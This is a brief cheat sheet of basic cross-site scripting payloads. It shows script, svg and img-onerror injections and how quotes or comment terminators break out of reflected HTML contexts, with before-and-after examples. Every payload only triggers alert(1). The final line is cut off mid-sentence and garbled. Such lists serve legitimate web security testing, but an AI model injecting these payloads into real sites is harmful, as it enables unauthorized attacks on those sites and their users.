XSS Cheat Sheet (Basic)
- Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
- Add ' or " to escape the payload from value of an HTML tag
"><script>alert(1)</script>
'><script>alert(1)</script>
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
- Add --> to escape the payload if input lands in HTML comments.
--><script>alert(1)</script>
<!-- REFLECTED_HERE -->
<!-- --><script>alert(1)</script> -->
- Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside